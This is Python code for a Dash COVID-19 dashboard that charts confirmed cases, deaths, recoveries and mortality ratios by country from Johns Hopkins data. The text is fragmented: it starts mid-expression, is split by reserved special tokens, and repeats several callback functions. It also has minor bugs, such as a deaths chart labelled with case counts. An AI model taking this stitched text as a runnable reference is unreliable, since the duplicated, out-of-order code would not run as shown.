'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} @app.callback(Output(component_id='box-1', component_property='figure'), [ Input(component_id='main-dropdown', component_property='value'), Input( component_id='main-dropdown-2', component_property='value')]) def update_maingraph(selected_country, selected_graph): if selected_graph is None and selected_country is None: selected_country = 'Canada' figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror =False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph is None and selected_country is not None: figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror =False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph == 'Total and Daily Confirmed Cases': figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df. loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode= 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df. loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode= 'lines', fill='tozeroy')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} else: cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F', 'Recovered': '#009E73'} figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x= final_df.loc[final_df['Country_Region'] == selected_country, 'Date'], y=final_df.loc[final_df['Country_Region'] == selected_country, selected_graph], marker_color=cols_dict[ selected_graph])] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, selected_graph].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title='Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> @app.callback(Output(component_id='global-box-1', component_property= 'figure'), [Input(component_id='global-dropdown', component_property= 'value')]) def global_update(select_global): if select_global == 'Global Cases Trend' or select_global is None: fig1000 = [] anno = [] for group, dataframe in cases_1000_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 1000 Cases']) trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di ['Confirmed'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig1000.append(trace) anno.append(a) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Cases Double Every 3 Days'], hovertemplate= '<b>Cases Double Every 3 Days</b>', showlegend=True)) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Cases Double Every 7 Days'], hovertemplate= '<b>Cases Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10 (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Confirmed Cases', xaxis={'title': 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[ 'Days Since 1000 Cases'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig1000, 'layout': layout_global} return fig_global elif select_global == 'Global Deaths Trend': fig100 = [] anno = [] for group, dataframe in deaths_100_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 100 Deaths']) trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di ['Deaths'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region' ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig100.append(trace) anno.append(a) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Deaths Double Every 3 Days'], hovertemplate= '<b>Deaths Double Every 3 Days</b>', showlegend=True)) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Deaths Double Every 7 Days'], hovertemplate= '<b>Deaths Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Deaths', 'range': [np.log10(100), np.log10(cases_1000_start['Deaths']. max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Deaths', xaxis={'title': 'Days Since First 100 deaths', 'range': [0, deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig100, 'layout': layout_global} return fig_global elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)': figmort = [] anno = [] m = mort.sort_values(by=['Confirmed'], ascending=False).head(20) m = m.sort_values(by=['Mortality_Percent'], ascending=True ).reset_index() for i in range(len(m)): m1 = m.loc[i, 'Country_Region'] m2 = m.loc[i, 'Mortality_Percent'] trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2], y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)], orientation='h', textposition='auto', marker=dict(color= '#FFB000', opacity=0.6, line=dict(color= 'rgba(255,176,0, 1)', width=1)), hovertemplate= '<b>%{y}</b><br>' + '<br>Observed Case Mortaility Pct: %{text}&#37;<br>', showlegend=False) figmort.append(trace) layout_global = go.Layout(yaxis={'title': 'Country / Region', 'fixedrange': True, 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Observed Case - Mortality Ratio', xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [ 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=750, hovermode='closest') fig_global = {'data': figmort, 'layout': layout_global} return fig_global elif select_global == 'Recoveries vs. Deaths By Country': figscat = [] rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100) ].reset_index() for i in range(len(rc)): scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i, 'Recovered']], mode='markers+text', text=[rc.loc[i, 'Country_Region']], marker_color=colors_dict_global[rc.loc[ i, 'Continent']], showlegend=False, marker=dict(size=12, line_width=1, opacity=0.75), hovertemplate= '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' + 'Deaths: %{x}<br>', textposition='bottom center', textfont= dict(size=10, color='rgba(0, 0, 0, 0.6)')) figscat.append(scat) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25, line=dict(color='grey', width=1), text=[ '# of Deaths = # of Recoveries'], hovertemplate= '<b># of Deaths = # of Recoveries</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Recoveries for Every Death', opacity=0.25, line=dict(color='green', width=3, dash='dash'), text=['2 Recoveries for Every Death'], hovertemplate= '<b>2 Recoveries for Every Death</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Deaths for Every Recovery', opacity=0.25, line=dict(color='firebrick', width=3, dash='dash' ), text=['2 Deaths for Every Recovery'], hovertemplate= '<b>2 Deaths for Every Recovery</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Recoveries', 'fixedrange': True, 'automargin': True, 'range': [np.log10(100), np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title= 'Recoveries vs. Deaths, By Country', xaxis={'title': 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100), np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, height=750, hovermode='closest' ) fig_global = {'data': figscat, 'layout': layout_global} return fig_global @app.callback([Output(component_id='main-dropdown-2', component_property= 'options'), Output(component_id='btext1', component_property='children' ), Output(component_id='subplot1', component_property='figure'), Output (component_id='btext2', component_property='children'), Output( component_id='subplot2', component_property='figure'), Output( component_id='btext3', component_property='children'), Output( component_id='subplot3', component_property='figure')], [Input( component_id='main-dropdown', component_property='value')]) def update_country(selected_country): if selected_country is None: selected_country = 'Canada' options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} else: options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} @app.callback(Output(component_id='box-1', component_property='figure'), [ Input(component_id='main-dropdown', component_property='value'), Input( component_id='main-dropdown-2', component_property='value')]) def update_maingraph(selected_country, selected_graph): if selected_graph is None and selected_country is None: selected_country = 'Canada' figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror =False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph is None and selected_country is not None: figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror =False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph == 'Total and Daily Confirmed Cases': figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df. loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode= 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df. loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode= 'lines', fill='tozeroy')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} else: cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F', 'Recovered': '#009E73'} figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x= final_df.loc[final_df['Country_Region'] == selected_country, 'Date'], y=final_df.loc[final_df['Country_Region'] == selected_country, selected_graph], marker_color=cols_dict[ selected_graph])] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, selected_graph].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title='Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} if __name__ == '__main__': app.run_server() <|reserved_special_token_1|> <|reserved_special_token_0|> urls = [ 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv' , 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv' , 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv' ] final_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv') final_df = calc_diff_country(final_df) final_df['Date'] = pd.to_datetime(final_df['Date']) final_df['Country_Region'] = final_df['Country_Region'].astype(str) cases_1000_start = final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df ['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[ 'Date'] cases_1000_start = cases_1000_start.reset_index() cases_1000_start = cases_1000_start.rename(columns={'Date': 'Start_Date'}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() cases_1000_start = pd.merge(cases_1000_start, final_df, on=[ 'Country_Region'], how='right') cases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date']) cases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date']) cases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()] cases_1000_start['Days Since 1000 Cases'] = (cases_1000_start['Date'] - cases_1000_start['Start_Date']).dt.days deaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df[ 'Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[ 'Date'] deaths_100_start = deaths_100_start.reset_index() deaths_100_start = deaths_100_start.rename(columns={'Date': 'Start_Date'}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() deaths_100_start = pd.merge(deaths_100_start, final_df, on=[ 'Country_Region'], how='right') deaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date']) deaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date']) deaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()] deaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] - deaths_100_start['Start_Date']).dt.days mort = final_df.groupby(['Country_Region'])['Date'].max().reset_index() mort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left') mort['Mortality_Percent'] = mort['Deaths'] / mort['Confirmed'] * 100.0 colors_dict_global = {'Europe': '#1D6996', 'Asia': '#CC503E', 'Africa': '#94346E', 'North America': '#38A6A5', 'Middle East': '#EDAD08', 'South America': '#E17C05', 'Caribbean & Central America': '#0F8554', 'Oceania': '#73AF48'} external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'] app = dash.Dash(__name__, external_stylesheets=external_stylesheets) server = app.server app.layout = html.Div(children=[html.H2(children='COVID-19 Dashboard'), html.H4(children= 'A Basic Dashboard to Help Track the COVID-19 Pandemic'), html.Br(), html.H5(children='Global View'), html.P(children= 'The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. The Global View includes the following:' ), html.Div([html.Ul([html.Li([html.B( 'Cumulative Cases by Country Since First 1000 Cases: '), 'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis' ]), html.Li([html.B( 'Cumulative Cases by Country Since First 100 Deaths: '), 'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis' ]), html.Li([html.B( 'Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): ' ), 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)' ]), html.Li([html.B( 'Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: ' ), 'This plots Recoveries against Deaths on a country by country basis. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)' ])])], style={'font-size': 12}), html.Br(), dcc.Dropdown(id= 'global-dropdown', options=[{'label': y, 'value': y} for y in [ 'Global Cases Trend', 'Global Deaths Trend', '% Mortality by Confirmed Cases (Top 20 Countries)', 'Recoveries vs. Deaths By Country']], placeholder= 'Pick Graphs From Here...'), dcc.Graph(id='global-box-1'), html.Br(), html.H5(children='Country View'), html.P( 'The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. The Country View includes the following:' ), html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B ('Confirmed: '), 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Recovered: '), 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Deaths: '), 'Cumulative Deaths from COVID-19 since January 22nd, 2020']), html.Li([ html.B('Total and Daily Confirmed Cases: '), 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country' ])])]), dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value': x} for x in list(final_df.Country_Region.unique())], placeholder= 'Pick a Country From Here...'), dcc.Dropdown(id='main-dropdown-2', placeholder='Pick Graphs From Here...'), dcc.Graph(id='box-1'), html. Div([html.Div([html.H6(children='Most Recent New Cases'), html.H1(id= 'btext1'), dcc.Graph(id='subplot1')], className='four columns', style={ 'color': '#648FFF'}), html.Div([html.H6(children= 'Most Recent Daily Deaths'), html.H1(id='btext2'), dcc.Graph(id= 'subplot2')], className='four columns', style={'color': '#DC267F'}), html.Div([html.H6(children='Most Recent Daily Recovered'), html.H1(id= 'btext3'), dcc.Graph(id='subplot3')], className='four columns', style={ 'color': '#009E73', 'layout': 'right'})], className='row')]) @app.callback(Output(component_id='global-box-1', component_property= 'figure'), [Input(component_id='global-dropdown', component_property= 'value')]) def global_update(select_global): if select_global == 'Global Cases Trend' or select_global is None: fig1000 = [] anno = [] for group, dataframe in cases_1000_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 1000 Cases']) trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di ['Confirmed'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np .log10(int(di['Confirmed'].max())), 'xref': 'x', 